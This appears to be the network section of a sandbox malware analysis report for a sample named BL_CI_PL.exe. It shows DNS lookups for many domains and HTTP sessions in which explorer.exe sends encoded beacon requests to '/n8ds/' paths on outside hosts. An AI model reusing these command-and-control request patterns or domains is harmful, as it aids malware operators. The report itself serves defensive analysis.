                                                                                                                                                    Nov 29, 2021 14:08:35.904197931 CET192.168.11.201.1.1.10x40fcStandard query (0)www.theyachtmarkets.comA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:08:40.919406891 CET192.168.11.201.1.1.10x97dcStandard query (0)www.talkingpoint.toursA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:08:45.980460882 CET192.168.11.201.1.1.10xb352Standard query (0)www.mackthetruck.comA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:08:51.728553057 CET192.168.11.201.1.1.10xed72Standard query (0)www.unitedmetal-saudi.comA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:08:57.446604967 CET192.168.11.201.1.1.10x34b1Standard query (0)www.tvterradafarinha.comA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:09:02.523262978 CET192.168.11.201.1.1.10xcbd1Standard query (0)www.palmasdelmarcondos.comA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:09:07.819602966 CET192.168.11.201.1.1.10x2cf8Standard query (0)www.recruitresumelibrary.comA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:09:12.864388943 CET192.168.11.201.1.1.10xda44Standard query (0)www.recoverytrivia.comA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:09:33.578607082 CET192.168.11.201.1.1.10xaaccStandard query (0)www.recruitresumelibrary.comA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:09:38.640125036 CET192.168.11.201.1.1.10x7522Standard query (0)www.lopsrental.leaseA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:10:03.946757078 CET192.168.11.201.1.1.10xaeeStandard query (0)www.3uwz9mpxk77g.bizA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:10:04.165286064 CET192.168.11.209.9.9.90xaeeStandard query (0)www.3uwz9mpxk77g.bizA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:10:05.180613995 CET192.168.11.201.1.1.10xaeeStandard query (0)www.3uwz9mpxk77g.bizA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:10:06.737534046 CET192.168.11.209.9.9.90xaeeStandard query (0)www.3uwz9mpxk77g.bizA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:10:06.737622023 CET192.168.11.209.9.9.90xaeeStandard query (0)www.3uwz9mpxk77g.bizA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:10:10.742304087 CET192.168.11.201.1.1.10xcdb6Standard query (0)www.3uwz9mpxk77g.bizA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:10:10.960792065 CET192.168.11.209.9.9.90xcdb6Standard query (0)www.3uwz9mpxk77g.bizA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:10:11.976008892 CET192.168.11.201.1.1.10xcdb6Standard query (0)www.3uwz9mpxk77g.bizA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:10:12.273547888 CET192.168.11.209.9.9.90xcdb6Standard query (0)www.3uwz9mpxk77g.bizA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:10:12.273586988 CET192.168.11.209.9.9.90xcdb6Standard query (0)www.3uwz9mpxk77g.bizA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:10:29.331868887 CET192.168.11.201.1.1.10x9bd1Standard query (0)www.recruitresumelibrary.comA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:10:34.377741098 CET192.168.11.201.1.1.10x9f58Standard query (0)www.yghdlhax.xyzA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:10:39.892662048 CET192.168.11.201.1.1.10xe980Standard query (0)www.littlefishth.comA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:10:45.048165083 CET192.168.11.201.1.1.10x8c3dStandard query (0)www.csenmoga.comA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:10:50.093056917 CET192.168.11.201.1.1.10x7c4dStandard query (0)www.growebox.comA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:10:55.810662031 CET192.168.11.201.1.1.10xff0aStandard query (0)www.32342231.xyzA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:11:00.857038021 CET192.168.11.201.1.1.10xdffdStandard query (0)www.topwowshopping.storeA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:11:11.713496923 CET192.168.11.201.1.1.10xf5d1Standard query (0)www.recoverytrivia.comA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:11:32.818710089 CET192.168.11.201.1.1.10x16d7Standard query (0)www.recruitresumelibrary.comA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:11:52.360733032 CET192.168.11.201.1.1.10x1fc7Standard query (0)www.3uwz9mpxk77g.bizA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:11:52.578974962 CET192.168.11.209.9.9.90x1fc7Standard query (0)www.3uwz9mpxk77g.bizA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:11:53.594285011 CET192.168.11.201.1.1.10x1fc7Standard query (0)www.3uwz9mpxk77g.bizA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:11:55.609416962 CET192.168.11.209.9.9.90x1fc7Standard query (0)www.3uwz9mpxk77g.bizA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:11:55.609427929 CET192.168.11.201.1.1.10x1fc7Standard query (0)www.3uwz9mpxk77g.bizA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:11:55.829699039 CET192.168.11.209.9.9.90x1fc7Standard query (0)www.3uwz9mpxk77g.bizA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:12:09.684891939 CET192.168.11.201.1.1.10xc6fbStandard query (0)www.divorcefearfreedom.comA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:12:14.871531010 CET192.168.11.201.1.1.10x23a3Standard query (0)www.reliablehomesellers.comA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:12:20.245069981 CET192.168.11.201.1.1.10xeeeaStandard query (0)www.jobl.spaceA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:12:25.353204012 CET192.168.11.201.1.1.10x1b33Standard query (0)www.testwebsite0711.comA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:12:30.383773088 CET192.168.11.201.1.1.10xaa17Standard query (0)www.dif-directory.xyzA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:12:40.709778070 CET192.168.11.201.1.1.10x2a8Standard query (0)www.32342231.xyzA (IP address)IN (0x0001)

                                                                                                                                                    DNS Answers

                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                    Nov 29, 2021 14:05:26.052336931 CET1.1.1.1192.168.11.200xeeb2No error (0)bgreenidaho.com20.124.109.2A (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:06:49.347855091 CET1.1.1.1192.168.11.200xc6cdName error (3)www.smartam6.xyznonenoneA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:06:54.393012047 CET1.1.1.1192.168.11.200xf21aNo error (0)www.diggingquartz.comdiggingquartz.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:06:54.393012047 CET1.1.1.1192.168.11.200xf21aNo error (0)diggingquartz.com50.62.172.157A (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:07:00.261423111 CET1.1.1.1192.168.11.200x6267Name error (3)www.testwebsite0711.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:07:05.629437923 CET1.1.1.1192.168.11.200x7e26No error (0)www.effective.store199.59.242.153A (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:07:10.901668072 CET1.1.1.1192.168.11.200x218aName error (3)www.tvterradafarinha.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:07:16.495420933 CET1.1.1.1192.168.11.200x901dNo error (0)www.ayudavida.com164.155.212.139A (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:07:22.531332016 CET1.1.1.1192.168.11.200xca9No error (0)www.gdav130.xyz35.244.144.199A (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:07:27.877001047 CET1.1.1.1192.168.11.200x968fName error (3)www.csenmoga.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:07:32.949280977 CET1.1.1.1192.168.11.200x4ab2Name error (3)www.recoverytrivia.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:07:38.860960007 CET1.1.1.1192.168.11.200x4f0No error (0)www.dietatrintadias.comdietatrintadias.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:07:38.860960007 CET1.1.1.1192.168.11.200x4f0No error (0)dietatrintadias.com216.172.172.87A (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:07:44.189960003 CET1.1.1.1192.168.11.200x7ffbNo error (0)www.helpcloud.xyz88.99.22.5A (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:07:49.452466011 CET1.1.1.1192.168.11.200x2f23No error (0)www.stylesbykee.com172.120.157.187A (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:07:54.831593990 CET1.1.1.1192.168.11.200xe76dName error (3)www.recruitresumelibrary.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:08:05.156760931 CET1.1.1.1192.168.11.200xafb5No error (0)www.mummymotors.commummymotors.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:08:05.156760931 CET1.1.1.1192.168.11.200xafb5No error (0)mummymotors.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:08:13.178037882 CET1.1.1.1192.168.11.200x2a0bServer failure (2)www.3uwz9mpxk77g.biznonenoneA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:08:13.178102970 CET1.1.1.1192.168.11.200x2a0bServer failure (2)www.3uwz9mpxk77g.biznonenoneA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:08:30.632986069 CET1.1.1.1192.168.11.200x3607No error (0)www.fatima2021.comfatima2021.brizy.siteCNAME (Canonical name)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:08:30.632986069 CET1.1.1.1192.168.11.200x3607No error (0)fatima2021.brizy.sitepreviewbrizycloudnlbv2-664b147e649a860c.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:08:30.632986069 CET1.1.1.1192.168.11.200x3607No error (0)previewbrizycloudnlbv2-664b147e649a860c.elb.us-east-1.amazonaws.com34.237.47.210A (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:08:35.916707039 CET1.1.1.1192.168.11.200x40fcName error (3)www.theyachtmarkets.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:08:40.952147961 CET1.1.1.1192.168.11.200x97dcNo error (0)www.talkingpoint.tourstalkingpoint.toursCNAME (Canonical name)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:08:40.952147961 CET1.1.1.1192.168.11.200x97dcNo error (0)talkingpoint.tours192.0.78.24A (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:08:40.952147961 CET1.1.1.1192.168.11.200x97dcNo error (0)talkingpoint.tours192.0.78.25A (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:08:46.173491001 CET1.1.1.1192.168.11.200xb352No error (0)www.mackthetruck.com203.170.80.250A (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:08:52.098727942 CET1.1.1.1192.168.11.200xed72No error (0)www.unitedmetal-saudi.comzhs.zohosites.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:08:52.098727942 CET1.1.1.1192.168.11.200xed72No error (0)zhs.zohosites.com136.143.191.204A (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:08:57.508605003 CET1.1.1.1192.168.11.200x34b1Name error (3)www.tvterradafarinha.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:09:02.694595098 CET1.1.1.1192.168.11.200xcbd1No error (0)www.palmasdelmarcondos.compalmasdelmarcondos.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:09:02.694595098 CET1.1.1.1192.168.11.200xcbd1No error (0)palmasdelmarcondos.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:09:07.862540007 CET1.1.1.1192.168.11.200x2cf8Name error (3)www.recruitresumelibrary.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:09:12.914556980 CET1.1.1.1192.168.11.200xda44Name error (3)www.recoverytrivia.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:09:33.625648975 CET1.1.1.1192.168.11.200xaaccName error (3)www.recruitresumelibrary.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:09:38.898581982 CET1.1.1.1192.168.11.200x7522No error (0)www.lopsrental.lease66.29.140.185A (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:10:06.737171888 CET1.1.1.1192.168.11.200xaeeServer failure (2)www.3uwz9mpxk77g.biznonenoneA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:10:06.737231970 CET1.1.1.1192.168.11.200xaeeServer failure (2)www.3uwz9mpxk77g.biznonenoneA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:10:12.273320913 CET1.1.1.1192.168.11.200xcdb6Server failure (2)www.3uwz9mpxk77g.biznonenoneA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:10:12.273365974 CET1.1.1.1192.168.11.200xcdb6Server failure (2)www.3uwz9mpxk77g.biznonenoneA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:10:29.375750065 CET1.1.1.1192.168.11.200x9bd1Name error (3)www.recruitresumelibrary.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:10:34.394896030 CET1.1.1.1192.168.11.200x9f58No error (0)www.yghdlhax.xyz192.64.119.254A (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:10:39.913105965 CET1.1.1.1192.168.11.200xe980No error (0)www.littlefishth.comlittlefishth.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:10:39.913105965 CET1.1.1.1192.168.11.200xe980No error (0)littlefishth.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:10:45.077820063 CET1.1.1.1192.168.11.200x8c3dName error (3)www.csenmoga.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:10:50.230967999 CET1.1.1.1192.168.11.200x7c4dNo error (0)www.growebox.comgrowebox.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:10:50.230967999 CET1.1.1.1192.168.11.200x7c4dNo error (0)growebox.com81.2.194.128A (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:10:55.839658022 CET1.1.1.1192.168.11.200xff0aName error (3)www.32342231.xyznonenoneA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:11:00.913892984 CET1.1.1.1192.168.11.200xdffdNo error (0)www.topwowshopping.store172.67.201.232A (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:11:00.913892984 CET1.1.1.1192.168.11.200xdffdNo error (0)www.topwowshopping.store104.21.76.223A (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:11:11.751492977 CET1.1.1.1192.168.11.200xf5d1Name error (3)www.recoverytrivia.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:11:32.859806061 CET1.1.1.1192.168.11.200x16d7Name error (3)www.recruitresumelibrary.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:11:55.829427958 CET1.1.1.1192.168.11.200x1fc7Server failure (2)www.3uwz9mpxk77g.biznonenoneA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:11:55.829490900 CET1.1.1.1192.168.11.200x1fc7Server failure (2)www.3uwz9mpxk77g.biznonenoneA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:11:55.829535961 CET1.1.1.1192.168.11.200x1fc7Server failure (2)www.3uwz9mpxk77g.biznonenoneA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:11:56.764240026 CET9.9.9.9192.168.11.200x1fc7Server failure (2)www.3uwz9mpxk77g.biznonenoneA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:12:09.701877117 CET1.1.1.1192.168.11.200xc6fbNo error (0)www.divorcefearfreedom.comdivorcefearfreedom.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:12:09.701877117 CET1.1.1.1192.168.11.200xc6fbNo error (0)divorcefearfreedom.com192.0.78.25A (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:12:09.701877117 CET1.1.1.1192.168.11.200xc6fbNo error (0)divorcefearfreedom.com192.0.78.24A (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:12:14.899331093 CET1.1.1.1192.168.11.200x23a3No error (0)www.reliablehomesellers.comreliablehomesellers.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:12:14.899331093 CET1.1.1.1192.168.11.200x23a3No error (0)reliablehomesellers.com38.143.25.232A (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:12:20.350740910 CET1.1.1.1192.168.11.200xeeeaName error (3)www.jobl.spacenonenoneA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:12:25.372308969 CET1.1.1.1192.168.11.200x1b33Name error (3)www.testwebsite0711.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:12:30.437779903 CET1.1.1.1192.168.11.200xaa17No error (0)www.dif-directory.xyzdif-directory.xyzCNAME (Canonical name)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:12:30.437779903 CET1.1.1.1192.168.11.200xaa17No error (0)dif-directory.xyz185.61.153.97A (IP address)IN (0x0001)
                                                                                                                                                    Nov 29, 2021 14:12:40.916712046 CET1.1.1.1192.168.11.200x2a8Name error (3)www.32342231.xyznonenoneA (IP address)IN (0x0001)

                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                    • bgreenidaho.com
                                                                                                                                                    • www.diggingquartz.com
                                                                                                                                                    • www.effective.store
                                                                                                                                                    • www.ayudavida.com
                                                                                                                                                    • www.gdav130.xyz
                                                                                                                                                    • www.dietatrintadias.com
                                                                                                                                                    • www.helpcloud.xyz
                                                                                                                                                    • www.stylesbykee.com
                                                                                                                                                    • www.mummymotors.com
                                                                                                                                                    • www.fatima2021.com
                                                                                                                                                    • www.talkingpoint.tours
                                                                                                                                                    • www.mackthetruck.com
                                                                                                                                                    • www.unitedmetal-saudi.com
                                                                                                                                                    • www.palmasdelmarcondos.com
                                                                                                                                                    • www.lopsrental.lease
                                                                                                                                                    • www.yghdlhax.xyz
                                                                                                                                                    • www.littlefishth.com
                                                                                                                                                    • www.growebox.com
                                                                                                                                                    • www.topwowshopping.store
                                                                                                                                                    • www.divorcefearfreedom.com
                                                                                                                                                    • www.reliablehomesellers.com
                                                                                                                                                    • www.dif-directory.xyz

                                                                                                                                                    HTTP Packets

                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    0192.168.11.204980720.124.109.2443C:\Users\user\Desktop\BL_CI_PL.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    1192.168.11.204984220.124.109.2443C:\Users\user\Desktop\BL_CI_PL.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    10192.168.11.204982034.102.136.18080C:\Windows\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 29, 2021 14:08:05.169428110 CET6429OUTGET /n8ds/?3fVD2v=9rZXD0c8pBS&lZOD=6hsdwDWbOloW+oddmH1y3GuNa2NTUXQYB9VwdvKa8csc++KRKb370Nh870wRdtnpcbjn HTTP/1.1
                                                                                                                                                    Host: www.mummymotors.com
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii:
                                                                                                                                                    Nov 29, 2021 14:08:05.340312958 CET6429INHTTP/1.1 403 Forbidden
                                                                                                                                                    Server: openresty
                                                                                                                                                    Date: Mon, 29 Nov 2021 13:08:05 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 275
                                                                                                                                                    ETag: "61973ffe-113"
                                                                                                                                                    Via: 1.1 google
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    11192.168.11.204982134.237.47.21080C:\Windows\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 29, 2021 14:08:30.765151024 CET6431OUTGET /n8ds/?lZOD=xrAotTyffsBJpcnKB2kZyNWsSnGPjBByJzEFrz2pnPZy718OzpkHnAopnraeQfQtdHy1&E0Dpk=l8hHaF HTTP/1.1
                                                                                                                                                    Host: www.fatima2021.com
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii:
                                                                                                                                                    Nov 29, 2021 14:08:30.895956993 CET6431INHTTP/1.1 301 Moved Permanently
                                                                                                                                                    Server: nginx
                                                                                                                                                    Date: Mon, 29 Nov 2021 13:08:30 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 178
                                                                                                                                                    Connection: close
                                                                                                                                                    Location: https://www.fatima2021.com/n8ds/?lZOD=xrAotTyffsBJpcnKB2kZyNWsSnGPjBByJzEFrz2pnPZy718OzpkHnAopnraeQfQtdHy1&E0Dpk=l8hHaF
                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    12192.168.11.2049823192.0.78.2480C:\Windows\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 29, 2021 14:08:40.962162971 CET6439OUTGET /n8ds/?lZOD=wE3cJZPNojFXEHzVtPzLvjQgQ8siWlvoMBTDgMX5y9SxEB5bNYsjP9rL8bMOP+2FRUIW&E0Dpk=l8hHaF HTTP/1.1
                                                                                                                                                    Host: www.talkingpoint.tours
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii:
                                                                                                                                                    Nov 29, 2021 14:08:40.971302986 CET6439INHTTP/1.1 301 Moved Permanently
                                                                                                                                                    Server: nginx
                                                                                                                                                    Date: Mon, 29 Nov 2021 13:08:40 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 162
                                                                                                                                                    Connection: close
                                                                                                                                                    Location: https://www.talkingpoint.tours/n8ds/?lZOD=wE3cJZPNojFXEHzVtPzLvjQgQ8siWlvoMBTDgMX5y9SxEB5bNYsjP9rL8bMOP+2FRUIW&E0Dpk=l8hHaF
                                                                                                                                                    X-ac: 2.hhn _dca
                                                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                    Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    13192.168.11.2049824203.170.80.25080C:\Windows\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 29, 2021 14:08:46.448832035 CET6440OUTGET /n8ds/?lZOD=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL&E0Dpk=l8hHaF HTTP/1.1
                                                                                                                                                    Host: www.mackthetruck.com
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii:


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    14192.168.11.2049825136.143.191.20480C:\Windows\explorer.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    Nov 29, 2021 14:08:52.261940002 CET6441OUTGET /n8ds/?lZOD=diws0RRfDxwvVlRuoC4BJCkr8rc2YRL+Z6kcdn/HANybL0ntvNIGnh8uTRYHcPOHwusF&E0Dpk=l8hHaF HTTP/1.1
                                                                                                                                                    Host: www.unitedmetal-saudi.com
                                                                                                                                                    Connection: close
                                                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                    Data Ascii:
                                                                                                                                                    Nov 29, 2021 14:08:52.430764914 CET6442INHTTP/1.1 404
                                                                                                                                                    Server: ZGS
                                                                                                                                                    Date: Mon, 29 Nov 2021 13:08:52 GMT
                                                                                                                                                    Content-Type: text/html
                                                                                                                                                    Content-Length: 4657
                                                                                                                                                    Connection: close
                                                                                                                                                    Set-Cookie: 0cea9df7db=9a53152e40f8a6327f1486af29c1a1cb; Path=/
                                                                                                                                                    X-XSS-Protection: 1
                                                                                                                                                    Set-Cookie: csrfc=30953e0c-66f0-4339-b67b-4a368c0a1549;path=/;priority=high
                                                                                                                                                    Set-Cookie: _zcsr_tmp=30953e0c-66f0-4339-b67b-4a368c0a1549;path=/;SameSite=Strict;priority=high
